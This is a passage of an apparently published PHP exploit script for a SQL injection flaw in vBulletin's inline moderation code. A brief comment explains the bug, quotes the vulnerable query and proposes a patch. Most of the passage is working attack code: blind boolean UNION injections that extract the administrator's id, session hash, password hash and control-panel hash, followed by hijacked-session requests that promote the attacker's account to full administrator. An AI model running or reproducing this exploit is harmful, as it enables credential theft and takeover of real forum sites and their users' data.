input->clean_array_gpc(\'p\', array( \'postids\' => TYPE_STR, )); $postids = explode(\',\', $vbulletin->GPC[\'postids\']); foreach ($postids AS $index => $postid) { if ($postids[\"$index\"] != intval($postid)) { unset($postids[\"$index\"]); } } if (empty($postids)) { eval(standard_error(fetch_error(\'no_applicable_posts_selected\'))); } if (count($postids) > $postlimit) { eval(standard_error(fetch_error(\'you_are_limited_to_working_with_x_posts\', $postlimit))); } break; ... when an element of $postids array is not an integer, it fails to unset() the proper value. An example: output: 99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/* 99999 they match! this because when php tries to comparise a string with an integer it tries to convert the string in its integer value, it chooses the first integer chars of the string itself! so unset() never run! the result is sql injection near lines 3792-3800: ... $posts = $db->query_read_slave(\" SELECT post.postid, post.threadid, post.visible, post.title, post.username, post.dateline, post.parentid, post.userid, thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid, thread.sticky, thread.open, thread.iconid FROM \" . TABLE_PREFIX . \"post AS post LEFT JOIN \" . TABLE_PREFIX . \"thread AS thread USING (threadid) WHERE postid IN (\" . implode(\',\', $postids) . \") ORDER BY post.dateline \"); ... this exploit extract various session hashes from the database to authenticate as admin and to change the privileges of a registered user I could not find a way to see results inside html, so this asks true/false questions to the database, copying posts around threads possible patch, replace: foreach ($postids AS $index => $postid) { if ($postids[\"$index\"] != intval($postid)) { unset($postids[\"$index\"]); } } with: foreach ($postids AS $index => $postid) { $postids[\"$index\"]=(int)$postids[\"$index\"]; } and, some line before: foreach ($threadids AS $index => $threadid) { if ($threadids[\"$index\"] != intval($threadid)) { unset($threadids[\"$index\"]); } } with: foreach ($threadids AS $index => $threadid) { $threadids[\"$index\"]=(int)$threadids[\"$index\"]; } vendor was contacted by email form... */ error_reporting(7); ini_set(\"max_execution_time\",0); ini_set(\"default_socket_timeout\",5); function quick_dump($string) { $result=\'\';$exa=\'\';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=\" .\";} else {$result.=\" \".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=\" \".dechex(ord($string[$i]));} else {$exa.=\" 0\".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.=\" \"; $exa.=\" \";} } return $exa.\" \".$result; } $proxy_regex = \'(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})\'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy==\'\') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo \'No response from \'.$host.\':\'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo \'Not a valid proxy...\';die; } $parts=explode(\':\',$proxy); echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy... \"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo \'No response from proxy...\';die; } } fputs($ock,$packet); if ($proxy==\'\') { $html=\'\'; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=\'\'; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=md5($argv[4]); $forumid=(int)$argv[5]; $existing_post=(int)$argv[6]; $port=80; $proxy=\"\"; for ($i=3; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>\"-p\") and ($temp<>\"-P\")) {$cmd.=\" \".$argv[$i];} if ($temp==\"-p\") { $port=str_replace(\"-p\",\"\",$argv[$i]); } if ($temp==\"-P\") { $proxy=str_replace(\"-P\",\"\",$argv[$i]); } } if (($path[0]<>\'/\') or ($path[strlen($path)-1]<>\'/\')) {echo \'Error... check the path!\'; die;} if ($proxy==\'\') {$p=$path;} else {$p=\'http://\'.$host.\':\'.$port.$path;} $data=\"vb_login_username=$user\"; $data.=\"&vb_login_password=\"; $data.=\"&s=\"; $data.=\"&do=login\"; $data.=\"&vb_login_md5password=$pass\"; $data.=\"&vb_login_md5password_utf=$pass\"; $packet=\"POST \".$p.\"login.php HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"login.php \"; $packet.=\"Accept-Language: en \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Content-Length: \".strlen($data).\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Connection: Close \"; $packet.=$data; sendpacketii($packet); $cookie=\"\"; $temp=explode(\"Set-Cookie: \",$html); for ($i=1; $i \".$cookie.\" \"; if (!eregi(\"sessionhash\",$cookie)){die(\"failed to login...\");}$temp=str_replace(\" \",\"\",$cookie);$temp=str_replace(\"sessionhash\",\"\",$temp); $temp=str_replace(\"lastvisit\",\"\",$temp);$temp=str_replace(\"lastactivity\",\"\",$temp);$temp=explode(\"=\",$temp);$temp=explode(\";\",$temp[1]); $cookie_prefix=trim($temp[1]);echo \"cookie prefix -> \".$cookie_prefix.\" \"; $chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $j=1;$uid=\"\"; echo \"admim user id -> \"; while (!strstr($uid,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data =\"s=\"; $data.=\"&do=docopyposts\"; $data.=\"&destforumid=$forumid\"; $data.=\"&title=suntzu\"; $data.=\"&forumid=$forumid\"; $data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/usergroupid=6/**/LIMIT/**/1/*\"; $packet =\"POST \".$p.\"inlinemod.php?f=$forumid HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: it \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Content-Length: \".strlen($data).\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie.\"; \"; $packet.=\"Connection: Close \"; $packet.=$data; sendpacketii($packet); $temp=explode(\"showthread.php?t=\",$html); $temp2=explode(\" \",$temp[1]); $thread=(int)$temp2[0]; $packet =\"GET \".$p.\"showthread.php?t=$thread HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: it \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie.\"; \"; $packet.=\"Connection: Close \"; sendpacketii($packet); if (eregi(\"You have an error in your SQL syntax\",$html)){echo $html; die(\" unknown query error...\");} if (eregi(\"join date\",$html)) {$uid.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die(\" Exploit failed...\"); } } $j++; } if (trim($uid)==\"\"){die(\" Exploit failed...\");}else{echo \" vulnerable!\";} $uid=intval($uid); function my_encode($my_string) { $encoded=\"CHAR(\"; for ($k=0; $k<=strlen($my_string)-1; $k++) { $encoded.=ord($my_string[$k]); if ($k==strlen($my_string)-1) {$encoded.=\")\";} else {$encoded.=\",\";} } return $encoded; } $j=1;$my_uid=\"\"; echo \" your user id -> \"; while (!strstr($my_uid,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data =\"s=\"; $data.=\"&do=docopyposts\"; $data.=\"&destforumid=$forumid\"; $data.=\"&title=suntzu\"; $data.=\"&forumid=$forumid\"; $data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username=\".my_encode($user).\"/**/LIMIT/**/1/*\"; $packet =\"POST \".$p.\"inlinemod.php?f=$forumid HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: it \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Content-Length: \".strlen($data).\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie.\"; \"; $packet.=\"Connection: Close \"; $packet.=$data; sendpacketii($packet); if (eregi(\"You have an error in your SQL syntax\",$html)){echo $html; die(\" unknown query error...\");} $temp=explode(\"showthread.php?t=\",$html); $temp2=explode(\" \",$temp[1]); $thread=(int)$temp2[0]; $packet =\"GET \".$p.\"showthread.php?t=$thread HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: it \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie.\"; \"; $packet.=\"Connection: Close \"; sendpacketii($packet); if (eregi(\"join date\",$html)) {$my_uid.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die(\" Exploit failed...\"); } } $j++; } $my_uid=intval($my_uid); $chars[0]=0;//null $chars=array_merge($chars,range(48,57)); //numbers $chars=array_merge($chars,range(97,102));//a-f letters $j=1;$sess_hash=\"\"; echo \" session hash -> \"; while (!strstr($sess_hash,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data =\"s=\"; $data.=\"&do=docopyposts\"; $data.=\"&destforumid=$forumid\"; $data.=\"&title=suntzu\"; $data.=\"&forumid=$forumid\"; $data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(sessionhash,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/session/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\"; $packet =\"POST \".$p.\"inlinemod.php?f=$forumid HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: it \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Content-Length: \".strlen($data).\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie.\"; \"; $packet.=\"Connection: Close \"; $packet.=$data; sendpacketii($packet); if (eregi(\"You have an error in your SQL syntax\",$html)){echo $html; die(\" unknown query error...\");} $temp=explode(\"showthread.php?t=\",$html); $temp2=explode(\" \",$temp[1]); $thread=(int)$temp2[0]; $packet =\"GET \".$p.\"showthread.php?t=$thread HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: it \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie.\"; \"; $packet.=\"Connection: Close \"; sendpacketii($packet); if (eregi(\"join date\",$html)) {$sess_hash.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die(\" Exploit failed...\"); } } $j++; } $j=1;$my_hash=\"\"; echo \" user password hash -> \"; while (!strstr($my_hash,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data =\"s=\"; $data.=\"&do=docopyposts\"; $data.=\"&destforumid=$forumid\"; $data.=\"&title=suntzu\"; $data.=\"&forumid=$forumid\"; $data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(password,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\"; $packet =\"POST \".$p.\"inlinemod.php?f=$forumid HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: en \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Content-Length: \".strlen($data).\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie.\"; \"; $packet.=\"Connection: Close \"; $packet.=$data; sendpacketii($packet); if (eregi(\"You have an error in your SQL syntax\",$html)){echo $html; die(\" unknown query error...\");} $temp=explode(\"showthread.php?t=\",$html); $temp2=explode(\" \",$temp[1]); $thread=(int)$temp2[0]; $packet =\"GET \".$p.\"showthread.php?t=$thread HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: en \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie.\"; \"; $packet.=\"Connection: Close \"; sendpacketii($packet); if (eregi(\"join date\",$html)) {$my_hash.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die(\" Exploit failed...\"); } } $j++; } $j=1;$cpsess_hash=\"\"; echo \" cp session hash -> \"; while (!strstr($cpsess_hash,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$chars)) { $data =\"s=\"; $data.=\"&do=docopyposts\"; $data.=\"&destforumid=$forumid\"; $data.=\"&title=suntzu\"; $data.=\"&forumid=$forumid\"; $data.=\"&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(hash,\".$j.\",1))=\".$i.\"),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cpsession/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*\"; $packet =\"POST \".$p.\"inlinemod.php?f=$forumid HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: en \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Content-Length: \".strlen($data).\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie.\"; \"; $packet.=\"Connection: Close \"; $packet.=$data; sendpacketii($packet); $temp=explode(\"showthread.php?t=\",$html); $temp2=explode(\" \",$temp[1]); $thread=(int)$temp2[0]; $packet =\"GET \".$p.\"showthread.php?t=$thread HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: en \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie.\"; \"; $packet.=\"Connection: Close \"; sendpacketii($packet); if (eregi(\"You have an error in your SQL syntax\",$html)){echo $html; die(\" unknown query error...\");} if (eregi(\"join date\",$html)) {$cpsess_hash.=chr($i);echo chr($i); sleep(1); break;} } if ($i==255) { die(\" Exploit failed...\"); } } $j++; } echo \" \"; $packet =\"GET \".$p.\"admincp/user.php?do=edit&u=$my_uid HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: en \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie_prefix.\"lastactivity=0; \".$cookie_prefix.\"password=\".md5(trim($my_hash)).\"; bbuserid=\".$uid.\"; \".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\"; \".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\"; \"; $packet.=\"Connection: Close \"; sendpacketii($packet); $temp=explode(\"adminhash\" value=\"\",$html); $temp2=explode(\"\"\",$temp[1]); $adminhash=$temp2[0]; echo \"adminhash ->\".$adminhash.\" \"; if ($adminhash<>\"\") {echo \" done! you are in... updating \".$user.\" rights\";} else {die(\" exploit failed...\");} //join to the Administrator group $my_email=\"suntzu@suntzu.com\"; $data =\"do=update\"; $data.=\"&adminhash=$adminhash\"; $data.=\"&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D\".$my_uid; $data.=\"&user%5Busername%5D=$user\"; $data.=\"&password=\"; $data.=\"&user%5Bemail%5D=$my_email\"; $data.=\"&user%5Blanguageid%5D=0\"; $data.=\"&user%5Busertitle%5D=Admin\"; $data.=\"&user%5Bcustomtitle%5D=0\"; $data.=\"&user%5Bhomepage%5D=\"; $data.=\"&user%5Bbirthday%5D%5Bmonth%5D=0\"; $data.=\"&user%5Bbirthday%5D%5Bday%5D=\"; $data.=\"&user%5Bbirthday%5D%5Byear%5D=\"; $data.=\"&user%5Bshowbirthday%5D=0\"; $data.=\"&user%5Bsignature%5D=\"; $data.=\"&user%5Bicq%5D=\"; $data.=\"&user%5Baim%5D=\"; $data.=\"&user%5Byahoo%5D=\"; $data.=\"&user%5Bmsn%5D=\"; $data.=\"&user%5Bskype%5D=\"; $data.=\"&options%5Bcoppauser%5D=0\"; $data.=\"&user%5Bparentemail%5D=$my_email\"; $data.=\"&user%5Breferrerid%5D=\"; $data.=\"&user%5Bipaddress%5D=\"; $data.=\"&user%5Bposts%5D=0\"; $data.=\"&userfield%5Bfield1%5D=\"; $data.=\"&userfield%5Bfield2%5D=\"; $data.=\"&userfield%5Bfield3%5D=\"; $data.=\"&userfield%5Bfield4%5D=\"; $data.=\"&user%5Busergroupid%5D=6\";//primary usergroup, 6=Administrators $data.=\"&user%5Bdisplaygroupid%5D=-1\"; $data.=\"&user%5Bmembergroupids%5D%5B%5D=5\";//secondary usergroup, 5=Super Moderators $data.=\"&options%5Bshowreputation%5D=1\"; $data.=\"&user%5Breputation%5D=10\"; $data.=\"&user%5Bwarnings%5D=0\"; $data.=\"&user%5Binfractions%5D=0\"; $data.=\"&user%5Bipoints%5D=0\"; $data.=\"&options%5Badminemail%5D=1\"; $data.=\"&options%5Bshowemail%5D=0\"; $data.=\"&options%5Binvisible%5D=0\"; $data.=\"&options%5Bshowvcard%5D=0\"; $data.=\"&options%5Breceivepm%5D=1\"; $data.=\"&options%5Breceivepmbuddies%5D=0\"; $data.=\"&options%5Bemailonpm%5D=0\"; $data.=\"&user%5Bpmpopup%5D=0\"; $data.=\"&options%5Bshowsignatures%5D=1\"; $data.=\"&options%5Bshowavatars%5D=1\"; $data.=\"&options%5Bshowimages%5D=1\"; $data.=\"&user%5Bautosubscribe%5D=-1\"; $data.=\"&user%5Bthreadedmode%5D=0\"; $data.=\"&user%5Bshowvbcode%5D=1\"; $data.=\"&user%5Bstyleid%5D=0\"; $data.=\"&adminoptions%5Badminavatar%5D=0\"; $data.=\"&adminoptions%5Badminprofilepic%5D=0\"; $data.=\"&user%5Btimezoneoffset%5D=0\"; $data.=\"&options%5Bdstauto%5D=1\"; $data.=\"&options%5Bdstonoff%5D=0\"; $data.=\"&user%5Bdaysprune%5D=-1\"; $data.=\"&user%5Bjoindate%5D%5Bmonth%5D=2\"; $data.=\"&user%5Bjoindate%5D%5Bday%5D=26\"; $data.=\"&user%5Bjoindate%5D%5Byear%5D=2007\"; $data.=\"&user%5Bjoindate%5D%5Bhour%5D=14\"; $data.=\"&user%5Bjoindate%5D%5Bminute%5D=39\"; $data.=\"&user%5Blastactivity%5D%5Bmonth%5D=2\"; $data.=\"&user%5Blastactivity%5D%5Bday%5D=26\"; $data.=\"&user%5Blastactivity%5D%5Byear%5D=2007\"; $data.=\"&user%5Blastactivity%5D%5Bhour%5D=14\"; $data.=\"&user%5Blastactivity%5D%5Bminute%5D=58\"; $data.=\"&user%5Blastpost%5D%5Bmonth%5D=0\"; $data.=\"&user%5Blastpost%5D%5Bday%5D=\"; $data.=\"&user%5Blastpost%5D%5Byear%5D=\"; $data.=\"&user%5Blastpost%5D%5Bhour%5D=\"; $data.=\"&user%5Blastpost%5D%5Bminute%5D=\"; $data.=\"&userid=\".$mu_uid; $data.=\"&ousergroupid=\"; $data.=\"&odisplaygroupid=0\"; $data.=\"&userfield%5Bfield1_set%5D=1\"; $data.=\"&userfield%5Bfield2_set%5D=1\"; $data.=\"&userfield%5Bfield3_set%5D=1\"; $data.=\"&userfield%5Bfield4_set%5D=1\"; $packet =\"POST \".$p.\"admincp/user.php?do=edit&u=$my_uid HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: en \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Content-Length: \".strlen($data).\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie_prefix.\"lastactivity=0; \".$cookie_prefix.\"password=\".md5(trim($my_hash)).\"; \".$cookie_prefix.\"userid=\".$uid.\"; \".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\"; \".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\"; \"; $packet.=\"Connection: Close \"; $packet.=$data; sendpacketii($packet); sleep(1); //now give full rights to the new Administrator $data =\"do=update\"; $data.=\"&adminhash=\".$adminhash; $data.=\"&adminpermissions%5Bcanadminsettings%5D=1\"; $data.=\"&adminpermissions%5Bcanadminstyles%5D=1\"; $data.=\"&adminpermissions%5Bcanadminlanguages%5D=1\"; $data.=\"&adminpermissions%5Bcanadminforums%5D=1\"; $data.=\"&adminpermissions%5Bcanadminthreads%5D=1\"; $data.=\"&adminpermissions%5Bcanadmincalendars%5D=1\"; $data.=\"&adminpermissions%5Bcanadminusers%5D=1\"; $data.=\"&adminpermissions%5Bcanadminpermissions%5D=1\"; $data.=\"&adminpermissions%5Bcanadminfaq%5D=1\"; $data.=\"&adminpermissions%5Bcanadminimages%5D=1\"; $data.=\"&adminpermissions%5Bcanadminbbcodes%5D=1\"; $data.=\"&adminpermissions%5Bcanadmincron%5D=1\"; $data.=\"&adminpermissions%5Bcanadminmaintain%5D=1\"; $data.=\"&adminpermissions%5Bcanadminplugins%5D=1\"; $data.=\"&cssprefs=\"; $data.=\"&dismissednews=\"; $data.=\"&userid=\".$my_uid; $data.=\"&oldpermissions=98300\"; $data.=\"&adminpermissions%5Bcanadminupgrade%5D=0\"; $packet =\"POST \".$p.\"admincp/adminpermissions.php?do=update HTTP/1.0 \"; $packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* \"; $packet.=\"Referer: http://\".$host.$path.\"profile.php \"; $packet.=\"Accept-Language: en \"; $packet.=\"Content-Type: application/x-www-form-urlencoded \"; $packet.=\"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) \"; $packet.=\"Host: \".$host.\" \"; $packet.=\"Content-Length: \".strlen($data).\" \"; $packet.=\"Pragma: no-cache \"; $packet.=\"Cookie: \".$cookie_prefix.\"lastactivity=0; \".$cookie_prefix.\"password=\".md5(trim($my_hash)).\"; \".$cookie_prefix.\"userid=\".$uid.\"; \".$cookie_prefix.\"sessionhash=\".trim($sess_hash).\"; \".$cookie_prefix.\"cpsession=\".trim($cpsess_hash).\"; \"; $packet.=\"Connection: Close \"; $packet.=$data; sendpacketii($packet); echo \" now go to http://\".$host.$path.\"admincp/index.php and login to the control panel...\"; ?>

Query Builder